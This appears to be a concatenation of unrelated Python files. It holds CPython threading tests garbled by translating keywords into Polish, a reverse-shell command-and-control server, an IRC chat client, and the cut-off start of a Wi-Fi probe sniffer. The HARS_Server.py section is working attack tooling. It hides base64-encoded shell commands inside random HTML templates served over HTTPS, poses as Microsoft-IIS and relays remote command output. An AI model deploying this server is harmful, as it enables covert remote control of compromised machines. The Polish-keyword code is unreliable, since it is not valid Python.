""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """jeżeli 1:
zaimportuj threading
z time zaimportuj sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up oraz nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
podnieś SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread jest still returned w
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
spróbuj:
dla i w range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: Nic)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
w_końcu:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
klasa RunSelfFunction(object):
def __init__(self, should_raise):
# The links w this refcycle z Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
jeżeli self.should_raise:
podnieś SystemExit
cyclic_object = RunSelfFunction(should_raise=Nieprawda)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
usuń cyclic_object
self.assertIsNic(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=Prawda)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
usuń raising_cyclic_object
self.assertIsNic(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(Prawda)
t.getName()
t.setName("name")
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNieprawda('daemon' w repr(t))
t.daemon = Prawda
self.assertPrawda('daemon' w repr(t))
def test_deamon_param(self):
t = threading.Thread()
self.assertNieprawda(t.daemon)
t = threading.Thread(daemon=Nieprawda)
self.assertNieprawda(t.daemon)
t = threading.Thread(daemon=Prawda)
self.assertPrawda(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread w the active list doesn't mess up
# the after-fork mechanism.
code = """jeżeli 1:
zaimportuj _thread, threading, os, time
def background_thread(evt):
# Creates oraz registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
jeżeli os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
inaczej:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be Prawda on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
sys.setswitchinterval(1e-6)
dla i w range(20):
t = threading.Thread(target=lambda: Nic)
t.start()
self.addCleanup(t.join)
pid = os.fork()
jeżeli pid == 0:
os._exit(1 jeżeli t.is_alive() inaczej 0)
inaczej:
pid, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """jeżeli 1:
zaimportuj os, threading
pid = os.fork()
jeżeli pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
inaczej:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nPrawda\nPrawda\n")
@unittest.skipIf(sys.platform w platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """jeżeli 1:
zaimportuj os, threading, sys
def f():
pid = os.fork()
jeżeli pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout jest fully buffered because nie a tty,
# we have to flush before exit.
sys.stdout.flush()
inaczej:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nPrawda\nPrawda\n")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock jest Nic until the thread jest started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, Nic)
t.start()
started.acquire()
self.assertPrawda(t.is_alive())
# The tstate lock can't be acquired when the thread jest running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertNieprawda(tstate_lock.acquire(timeout=0), Nieprawda)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertPrawda(tstate_lock.acquire(timeout=5), Nieprawda)
# But is_alive() jest still Prawda: we hold _tstate_lock now, which
# prevents is_alive() z knowing the thread's end-of-life C code
# jest done.
self.assertPrawda(t.is_alive())
# Let is_alive() find out the C code jest done.
tstate_lock.release()
self.assertNieprawda(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertPrawda(t._tstate_lock jest Nic)
def test_repr_stopped(self):
# Verify that "stopped" shows up w repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear w the repr w a reasonable amount of time.
# Implementation detail: jako of this writing, that's trivially true
# jeżeli .join() jest called, oraz almost trivially true jeżeli .is_alive() jest
# called. The detail we're testing here jest that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
dla i w range(500):
jeżeli LOOKING_FOR w repr(t):
przerwij
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should podnieś ValueError jeżeli released too often.
dla limit w range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
dla _ w range(limit)]
dla t w threads:
t.start()
dla t w threads:
t.join()
threads = [threading.Thread(target=bs.release)
dla _ w range(limit)]
dla t w threads:
t.start()
dla t w threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator jest created w a C thread that jest
# destroyed dopóki the generator jest still used. The issue was that a
# generator contains a frame, oraz the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function jest setup.
def noop_trace(frame, event, arg):
# no operation
zwróć noop_trace
def generator():
dopóki 1:
uzyskaj "generator"
def callback():
jeżeli callback.gen jest Nic:
callback.gen = generator()
zwróć next(callback.gen)
callback.gen = Nic
old_trace = sys.gettrace()
sys.settrace(noop_trace)
spróbuj:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator w a C thread which exits after the call
zaimportuj _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator w a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
dla test w range(3):
# The trace function jest still called here
callback()
w_końcu:
sys.settrace(old_trace)
klasa ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """jeżeli 1:
zaimportuj sys, os, time, threading
# a thread, which waits dla the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout jest fully buffered because nie a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait dla a non-daemon thread
script = """jeżeli 1:
zaimportuj os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform w platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but z a forked interpreter
script = """jeżeli 1:
childpid = os.fork()
jeżeli childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform w platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called z a worker thread
# In the forked process, the main Thread object must be marked jako stopped.
script = """jeżeli 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
jeżeli childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should nie block: main_thread jest already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform w platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of w
# the main thread.
script = """jeżeli Prawda:
zaimportuj os
zaimportuj random
zaimportuj sys
zaimportuj time
zaimportuj threading
thread_has_run = set()
def random_io():
'''Loop dla a dopóki sleeping random tiny amounts oraz doing some I/O.'''
dopóki Prawda:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
dla _ w range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = Prawda
new_thread.start()
count += 1
dopóki len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertNieprawda(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform w platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock w a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process oraz wait it
pid = os.fork()
jeżeli pid > 0:
os.waitpid(pid, 0)
inaczej:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
dla i w range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
dla t w threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
dla i w range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
jeżeli pid == 0:
# check that threads states have been cleared
jeżeli len(sys._current_frames()) == 1:
os._exit(0)
inaczej:
os._exit(1)
inaczej:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
dla t w threads:
t.join()
klasa SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""jeżeli 1:
zaimportuj os
zaimportuj threading
zaimportuj time
def f():
# Sleep a bit so that the thread jest still running when
# Py_EndInterpreter jest called.
time.sleep(0.05)
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same jako above, but a delay gets introduced after the thread's
# Python code returned but before the thread state jest deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""jeżeli 1:
zaimportuj os
zaimportuj threading
zaimportuj time
klasa Sleeper:
def __del__(self):
time.sleep(0.05)
tls = threading.local()
def f():
# Sleep a bit so that the thread jest still running when
# Py_EndInterpreter jest called.
time.sleep(0.05)
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""jeżeli 1:
zaimportuj os
zaimportuj threading
zaimportuj time
def f():
# Make sure the daemon thread jest still running when
# Py_EndInterpreter jest called.
time.sleep(10)
threading.Thread(target=f, daemon=Prawda).start()
"""
script = r"""jeżeli 1:
zaimportuj _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
przy test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
klasa ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be podnieśd jeżeli Thread.start() jest called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", Prawda)
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' oraz test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X albo FreeBSD which have small default stack sizes
# dla threads
script = """jeżeli Prawda:
zaimportuj threading
def recurse():
zwróć recurse()
def outer():
spróbuj:
recurse()
wyjąwszy RecursionError:
dalej
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""jeżeli Prawda:
zaimportuj threading
zaimportuj time
running = Nieprawda
def run():
global running
running = Prawda
dopóki running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
dopóki nie running:
time.sleep(0.01)
running = Nieprawda
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception w thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""jeżeli Prawda:
zaimportuj sys
zaimportuj threading
zaimportuj time
running = Nieprawda
def run():
global running
running = Prawda
dopóki running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
dopóki nie running:
time.sleep(0.01)
sys.stderr = Nic
running = Nieprawda
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception w thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""jeżeli Prawda:
zaimportuj sys
zaimportuj threading
zaimportuj time
running = Nieprawda
def run():
global running
running = Prawda
dopóki running:
time.sleep(0.01)
1/0
sys.stderr = Nic
t = threading.Thread(target=run)
t.start()
dopóki nie running:
time.sleep(0.01)
running = Nieprawda
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
klasa TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes oraz affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
klasa LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
klasa PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock jest Nic, 'RLock nie implemented w C')
klasa CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
klasa EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
klasa ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default oraz exports its API.
locktype = staticmethod(threading.Condition)
klasa ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
klasa SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
klasa BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
klasa BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
jeżeli __name__ == "__main__":
unittest.main()
|
HARS_Server.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# HTTP ASYNCHRONE REVERSE SHELL
# Version : 0.1 POC
# Git : https://github.com/onSec-fr
import BaseHTTPServer, SimpleHTTPServer
import ssl
import os
import base64
import threading
import sys
import random
# Config
PORT = 443
CERT_FILE = '../server.pem'
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
# Custom headers
def _set_headers(self):
self.send_header("Cache-Control", "private, max-age=0")
self.send_header("Content-Type", "text/html; charset=utf-8")
self.send_header("Vary", "Accept-Encoding")
self.send_header("Connection", "close")
self.end_headers()
# GET events
def do_GET(self):
if self.path.startswith("/search"):
if initConn == False:
# If client say hello, then reply hello (first connection)
if base64.b64decode(self.headers['Cookie']) == "HELLO":
print(Colors.GREEN + '[!] Connection established with ' + self.client_address[0] + "\n" + Colors.END)
InitConn()
self.send_response(200)
self._set_headers()
cmd = 'HELLO'
encodedCmd = str(base64.b64encode(cmd.encode("utf-8")))
rndtemplate = random.choice([x for x in os.listdir("../templates") if os.path.isfile(os.path.join("../templates", x))])
with open("../templates/" + rndtemplate, 'r') as file:
outfile = file.read() + encodedCmd
self.wfile.write(outfile)
else:
self.send_response(404)
self._set_headers()
self.wfile.write("Not found")
# Client ask for instructions
elif base64.b64decode(self.headers['Cookie']) == "ASK":
with open('search', 'r') as file:
outfile = file.read()
self.send_response(200)
self._set_headers()
self.wfile.write(outfile)
if (wait == False):
InitFile()
# Client reply with output
else:
resp = base64.b64decode(self.headers['Cookie'])
if resp == "EXIT OK":
stop_server()
else:
print(Colors.LIGHT_WHITE + "\n" + resp + Colors.END)
InitFile()
self.send_response(200)
self._set_headers()
with open('search', 'r') as file:
outfile = file.read()
self.wfile.write(outfile)
CancelWait()
else:
self.send_response(404)
self._set_headers()
self.wfile.write("Not found")
# Save logs
log_file = open('../logs/logs.txt', 'w')
def log_message(self, format, *args):
self.log_file.write("%s - - [%s] %s\n" %(self.client_address[0],self.log_date_time_string(),format%args))
def InitConn():
global initConn
initConn = True
def CancelWait():
global wait
wait = False
# Choose random template file
def InitFile():
rndtemplate = random.choice([x for x in os.listdir("../templates") if os.path.isfile(os.path.join("../templates", x))])
with open("../templates/" + rndtemplate, 'r') as file:
template = file.read()
outfile = open("search", "w")
outfile.write(template)
outfile.close()
class Colors:
BLACK = "\033[0;30m"
RED = "\033[0;31m"
GREEN = "\033[0;32m"
BROWN = "\033[0;33m"
BLUE = "\033[0;34m"
PURPLE = "\033[0;35m"
CYAN = "\033[0;36m"
LIGHT_GRAY = "\033[0;37m"
DARK_GRAY = "\033[1;30m"
LIGHT_RED = "\033[1;31m"
LIGHT_GREEN = "\033[1;32m"
YELLOW = "\033[1;33m"
LIGHT_BLUE = "\033[1;34m"
LIGHT_PURPLE = "\033[1;35m"
LIGHT_CYAN = "\033[1;36m"
LIGHT_WHITE = "\033[1;37m"
BOLD = "\033[1m"
FAINT = "\033[2m"
ITALIC = "\033[3m"
UNDERLINE = "\033[4m"
BLINK = "\033[5m"
NEGATIVE = "\033[7m"
CROSSED = "\033[9m"
END = "\033[0m"
if not __import__("sys").stdout.isatty():
for _ in dir():
if isinstance(_, str) and _[0] != "_":
locals()[_] = ""
else:
if __import__("platform").system() == "Windows":
kernel32 = __import__("ctypes").windll.kernel32
kernel32.SetConsoleMode(kernel32.GetStdHandle(-11), 7)
del kernel32
# Start http server
def start_server():
global httpd
print(Colors.BLUE + '[!] Server listening on port ' + str(PORT) + ', waiting connection from client...' + Colors.END)
server_class = BaseHTTPServer.HTTPServer
MyHandler.server_version = "Microsoft-IIS/8.5"
MyHandler.sys_version = ""
httpd = server_class(('0.0.0.0', PORT), MyHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile=CERT_FILE, server_side=True)
httpd.serve_forever()
# Exit
def stop_server():
print(Colors.YELLOW + '[!] Exit' + Colors.END)
os.remove("search")
os._exit(1)
if __name__ == '__main__':
# Init
initConn = False
wait = True
InitFile()
try:
# Start http server in separate thread
daemon = threading.Thread(target=start_server)
daemon.daemon = True
daemon.start()
# Wait for first connection from client
while (initConn == False):
pass
while True:
cmd = raw_input("Command> ")
wait = True
print(Colors.BLUE + 'Awaiting response ...' + Colors.END)
encodedCmd = str(base64.b64encode(cmd.encode("utf-8")))
rndtemplate = random.choice([x for x in os.listdir("../templates") if os.path.isfile(os.path.join("../templates", x))])
with open("../templates/" + rndtemplate, 'r') as file:
template = file.read() + encodedCmd
outfile = open("search", "w")
outfile.write(template)
outfile.close()
# Wait for client's reply
while (wait == True):
pass
except KeyboardInterrupt:
stop_server()
|
client.py
|
#! /usr/bin/env python3
import json
import re
import socket
import sys
import threading
import time
import tkinter as tk
from datetime import datetime
IRCRE = ('^(?::(\S+?)(?:!(\S+?))?(?:@(\S+?))? )?' # Nick!User@Host
+ '(\S+)(?: (?!:)(.+?))?(?: :(.+))?$') # CMD Params Params :Message
class IRC(object):
def connect(self, server, port, nick, user=None, name=None):
self.nick = nick
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(260) # TODO: Settings
self.sock.connect((server, port))
self.send('NICK {}'.format(nick))
self.send('USER {} 0 * :{}'.format(user or nick, name or nick))
self.channels = {}
def send(self, text):
# TODO: Make sure not longer than 512
self.sock.send((text + '\r\n').encode('UTF-8'))
self.log('>{}'.format(text), raw=True)
return text
def sendcmd(self, cmd, params=[], msg=None):
if len(params): cmd += ' ' + ' '.join(params)
if msg is not None: cmd += ' :' + msg
return self.send(cmd)
def mainloop(self):
buffer = b''
while True:
try:
buffer += self.sock.recv(2048)
except socket.timeout:
pass # should reconnect
lines = buffer.split(b'\r\n')
buffer = lines.pop()
for line in lines:
line = line.decode('utf-8', 'replace') # TODO: Encoding settings
self.log('<{}'.format(line), raw=True)
self.handle_message(line)
def handle_message(self, message):
matched = re.match(IRCRE, message)
nick, user, host, cmd, params, msg = matched.groups()
if hasattr(self, 'on'+cmd):
handler = getattr(self,'on'+cmd)
handler(nick, user, host, cmd, (params or '').split(' '), msg)
def onPING(self, nick, user, host, cmd, params, msg):
self.sendcmd('PONG', msg=msg)
class Client(IRC):
def __init__(self, server, port, nick, user=None, name=None):
self.nick = nick
self.master = tk.Tk()
self.rawlog = tk.Text(self.master, state=tk.DISABLED)
self.rawlog.pack(fill=tk.BOTH, expand=1)
self.chanbox = tk.Listbox(self.master)
self.chanbox.pack(fill=tk.Y, side=tk.LEFT)
self.chanbox.bind('<<ListboxSelect>>', self.chanboxclick)
self.nickbox = tk.Listbox(self.master)
self.nickbox.pack(fill=tk.Y, side=tk.RIGHT)
self.chatlog = tk.Text(self.master, state=tk.DISABLED)
self.chatlog.pack(fill=tk.BOTH, expand=1)
self.activechan = tk.Label(self.master, text=name)
self.activechan.pack(side=tk.LEFT)
self.chatbox = tk.Entry(self.master)
self.chatbox.pack(fill=tk.X, side=tk.BOTTOM)
self.chatbox.focus_set()
self.master.bind('<Return>', self.chatboxsend)
self.cur_chan = self.nick
self.connect(server, port, nick, user, name)
def chanboxclick(self, event):
sel = self.chanbox.curselection()
self.set_chan(sorted(self.channels)[sel[0]])
def chatboxsend(self, event):
msg = self.chatbox.get()
self.chatbox.delete(0, tk.END)
if not msg.startswith('/'):
self.log('{} <{}> {}'.format(self.cur_chan, self.nick, msg))
self.sendcmd('PRIVMSG', [self.cur_chan], msg)
return
split = msg[1:].split(' ', 2)
command = split[0].lower()
if command in ('join', 'j'):
self.sendcmd('JOIN', [split[1]])
elif command in ('part', 'p', 'leave'):
chan = self.cur_chan if len(split) < 2 else split[1]
self.sendcmd('PART', [chan])
elif command in ('msg', 'pm'):
self.sendcmd('PRIVMSG', [split[1]], split[2])
elif command in ('quit', 'q', 'exit'):
self.sendcmd('QUIT')
sys.exit()
elif command in ('raw', 'quote'):
self.send(msg[1:].split(' ',1)[1])
elif command in ('names', 'nicks', 'users'):
self.log(', '.join(self.channels[self.cur_chan]))
elif command in ('chan', 'channel', 'chans', 'channels', 'listchans'):
if len(split) < 2:
self.log(', '.join(self.channels))
self.log('Type /chan #channel to switch active channels')
elif split[1] in self.channels:
self.set_chan(split[1])
else:
self.log('')
else:
self.log("UNKNOWN COMMAND: {}".format(command))
def log(self, text, raw=False):
log = self.rawlog if raw else self.chatlog
log.config(state=tk.NORMAL)
log.insert(tk.END, datetime.now().strftime('[%H:%M] ') + text + '\n')
log.config(state=tk.DISABLED)
log.see(tk.END)
def onPRIVMSG(self, nick, user, host, cmd, params, msg):
self.log('{} <{}> {}'.format(params[0], nick, msg))
def onJOIN(self, nick, user, host, cmd, params, msg):
channel = params[0]
self.log('{} has joined {} ({}@{})'.format(nick, channel, user, host))
if nick == self.nick:
self.channels[channel] = []
self.update_chans()
self.set_chan(channel)
if nick not in self.channels[channel]:
self.channels[channel].append(nick)
if channel == self.cur_chan:
self.update_nicks()
def onPART(self, nick, user, host, cmd, params, msg):
channel = params[0]
self.log('{} has parted {} ({}@{})'.format(nick, channel, user, host))
if nick == self.nick:
self.channels.pop(channel)
print(sorted(self.channels))
if channel == self.cur_chan:
self.set_chan(sorted(self.channels)[0])
self.update_chans()
else:
self.channels[channel].remove(nick)
if channel == self.cur_chan:
self.update_nicks()
def onQUIT(self, nick, user, host, cmd, params, msg):
for channel in self.channels:
if nick not in self.channels[channel]:
continue
self.channels[channel].remove(nick)
if channel == self.cur_chan:
self.update_nicks()
def on353(self, nick, user, host, cmd, params, msg):
for nick in msg.split(' '):
nick = nick.lstrip('@+') # TODO: Pull from server meta
if nick not in self.channels[params[2]]:
self.channels[params[2]].append(nick)
def on366(self, nick, user, host, cmd, params, msg):
self.update_nicks()
def set_chan(self, channel):
self.cur_chan = channel
self.activechan.config(text=self.cur_chan)
self.update_nicks()
def update_nicks(self):
self.nickbox.delete(0, tk.END)
for nick in sorted(self.channels[self.cur_chan]):
self.nickbox.insert(tk.END, nick)
def update_chans(self):
self.chanbox.delete(0, tk.END)
for channel in sorted(self.channels):
self.chanbox.insert(tk.END, channel)
def main():
with open('config.json', 'r') as f:
config = json.loads(f.read())
client = Client(config['serv'], config['port'],
config['nick'], config['user'], config['name'])
client.sendcmd('JOIN', [config['chan']])
x = threading.Thread(target=client.mainloop)
x.daemon = True
x.start()
client.master.mainloop()
if __name__ == '__main__':
main()
|
probeSniffer.py
|
#!/usr/bin/env python3
# -.- coding: utf-8 -.-
import os
import time
import sys
sys.path.append('/home/bayscideaswaimea/.local/bin/scapy')
sys.path.append('/home/bayscideaswaimea/.local/lib/python3.5/site-packages')
print(sys.path)
import sqlite3
import threading
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import datetime
import urllib.request as urllib2
import argparse
parser = argparse.ArgumentParser(usage="probeSniffer.py interface [-h] [-d] [-b] [--nosql] [--addnicks] [--flushnicks] [--debug]")
parser.add_argument("interface", help='Interface (in monitor mode) for capturing the packets')
parser.add_argument("-d", action='store_true', help='do not show duplicate requests')
